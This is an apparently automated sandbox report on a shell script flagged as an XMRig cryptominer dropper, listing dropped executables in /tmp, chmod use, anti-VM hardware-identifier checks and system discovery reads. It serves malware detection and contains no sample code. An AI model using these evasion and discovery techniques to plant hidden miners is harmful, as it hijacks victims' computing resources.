Malware Analysis Report

2025-05-06 04:16

Sample ID 241024-ca78es1fqk
Target 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
SHA256 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb
Tags
xmrig antivm defense_evasion discovery miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb

Threat Level: Known bad

The file 8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh was found to be: Known bad.

Malicious Activity Summary

xmrig antivm defense_evasion discovery miner

xmrig

XMRig Miner payload

File and Directory Permissions Modification

Executes dropped EXE

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Reads CPU attributes

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-24 01:53

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:56

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/check.sh /tmp/check.sh N/A
N/A /tmp/xmrigDaemon /tmp/xmrigDaemon N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A
N/A /tmp/xmrigMiner /tmp/xmrigMiner N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xmrigMiner N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xmrigMiner N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A
File opened for reading /proc/cpuinfo /tmp/xmrigMiner N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/online /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /tmp/xmrigMiner N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/cpumap /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xmrigMiner N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xmrigMiner N/A
File opened for reading /sys/bus/dax/devices /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_core/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/cpumap /tmp/xmrigMiner N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xmrigMiner N/A
File opened for reading /sys/bus/soc/devices /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_atom/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_core/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/cpu_core/cpus /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/cpumap /tmp/xmrigMiner N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/meminfo /tmp/xmrigMiner N/A
File opened for reading /sys/bus/dax/devices /tmp/xmrigMiner N/A
File opened for reading /sys/bus/dax/devices /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/online /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /tmp/xmrigMiner N/A
